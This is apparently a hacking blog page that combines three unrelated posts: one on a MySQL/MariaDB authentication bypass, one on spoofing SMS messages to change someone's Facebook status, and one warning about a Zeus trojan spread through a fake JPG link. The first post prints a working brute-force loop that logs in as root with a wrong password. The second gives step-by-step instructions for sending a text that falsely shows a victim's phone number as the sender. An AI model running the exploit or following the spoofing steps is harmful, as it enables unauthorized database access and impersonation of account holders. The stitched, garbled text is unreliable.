Recently a serious vulnerability inside mysql has been found. According to the advisory the following versions are affected - 5.5.23, 5.3.6, 5.2.12, 5.1.62. This is not a the first time authentication vulnerability has been found inside mysql, However the developers fail to protect it.
So what was the fault?, How and why is mysql authentication affected. According to researchers the mysql authentication was checked for wrong password 255 times out of 256. Which means that one in 256 passwords might let you in. In order to exploit this vulnerability, it takes just this piece of the code to be injected:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done mysql>
"When a user connects to MariaDB/MySQL, a token (SHAover a password and a random scramble string) is calculated and comparedwith the expected value. Because of incorrect casting, it might'vehappened that the token and the expected value were considered equal,even if the memcmp() returned a non-zero value. In this caseMySQL/MariaDB would think that the password is correct, even while it isnot. Because the protocol uses random strings, the probability ofhitting this bug is about 1/256."
"Which means, if one knows a user name to connect (and "root" almostalways exists), she can connect using *any* password by repeatingconnection attempts. ~300 attempts takes only a fraction of second, sobasically account password protection is as good as nonexistent.Any client will do, there's no need for a special libmysqlclient library."
CounterMeasures
Patch your MySQL or MariaDB installations if you haven't already.
There are tons of Facebook users who use a feature called facebook text in order to update a facebook status. If you have enabled this feature all you need to do in order to update your status is to type in your status and send it to "923223265".
However the idea behind this facebook Account status hack is to send a fake sms from your friend's number, therefore the facebook will think that the message has came from the legitimate source and hence it will update the victims Status.
SMS Global
SMSGlobal is a website that allows you send fake sms, The free account only allows you to send 25 SMS, However the business account allows you to send more. All you need to do is to register on SMS global, activate your account. After logging in to your account, click on “Send SMS to a Number”.
Send SMS To:923223265 (Facebook)
Sender ID From: Victims Mobile Number.
Message: The Status which you would like to be updated.
Facebook Hacking Beware!!! New Picture Worm Hits in Facebook Today!!!!
)
From last Few Months, Facebook has been widely targeted for scam and spreading Malware Bytes ( Virus!). of of those spreading worm i discovered recently was when I Chatting With my Friend, The Following From the Sudden Appeared.
Hehe!!! Lool http://tinyurl.com/Wooo-2841-jpg
From The Above ScreenShot,You can see Clearly The Tinyurl Has Been Used To Shorten The Url. one more thing to note is that its not and Image File end with .JPG extension then - .jpg
The Above Screenshot Describes a more clear picture of the what are you going to download along with the JPG file. The exe basically a Zeus Trojan,Zeus is the one most popular botnets used for stealing sensitive information such as password, credit card numbers. one of it's popular feature is and Anti VM and Anti Sandbox capability, making it useless for testing it inside virtual environments.
A scam at Virus total shows that only 3/18 Url Scanner were able to detect it as a malware bytes site, rest of them failed.
kindly spread the news by sharing my bog with your friends and people you may know, so they should not fall for the Malware Bytes.